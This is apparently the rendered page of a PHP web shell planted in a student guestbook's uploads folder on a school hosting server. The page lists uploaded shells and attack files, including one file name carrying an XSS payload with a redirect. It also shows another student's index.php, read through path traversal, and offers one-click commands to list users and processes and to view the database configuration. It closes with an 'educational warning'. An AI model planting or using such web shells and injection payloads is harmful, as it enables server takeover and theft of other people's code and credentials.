🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../577325.klas4s23.mid-ica.nl/public_html/l4-pro-1-food-delivery-express-dlf/index.php

<!DOCTYPE html>
<html lang="nl">
    
<?php 
include $_SERVER['DOCUMENT_ROOT'] . '/inc/data.php';
include $_SERVER['DOCUMENT_ROOT'] . "/inc/site/head.php"; ?>
<body>
    <?php include $_SERVER['DOCUMENT_ROOT'] . "/inc/site/header.php"; ?>

    <section class="banner">
            <h2>BBQ Blitz</h2>
    </section>

    <main>
        <article>
            <img src="/assets/images/grill.png" alt="BBQ">
        </article>
        <article>
            <h2>Welkom bij BBQ Blitz</h2>
            <p>"let us grill"</p>
            <p>BBQ Blitz is een online platform waar je BBQ grill kunt bestellen. Wij leveren bij jou thuis en je kunt direct lekker eten. Wij hebben verschillende BBQ Gerechten voor verschillende gelegenheden. Kijk snel in ons assortiment en bestel jouw eten.</p>
            <a class="button" href="/order.php">Bestellen</a>
        </article>
    </main>

    
<?php

    // Fetch all reviews
    $getAllReviews = $reviews->getAllReviews();
?>


<section class="reviews">
    <h2 style="margin: 2.5%";>Reviews</h2>
    <ul>
        <?php foreach ($getAllReviews as $review): ?>
            <?php $klant = $auth->getUserById($review->klant) ?>
        <li style="border: 3px #b22222 solid; border-radius: 10px; margin: 1px 3px 5px -10px; padding:2%">
            <h3 ><?php echo htmlspecialchars($klant->firstname); ?></h3>
            <p>Stars: <?php echo $review->stars; ?></p>
            <p><?php echo htmlspecialchars($review->message); ?></p>
        </li>
        <?php endforeach; ?>
    </ul>
</section>
  



    <?php include $_SERVER['DOCUMENT_ROOT'] . "/inc/site/footer.php"; ?>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!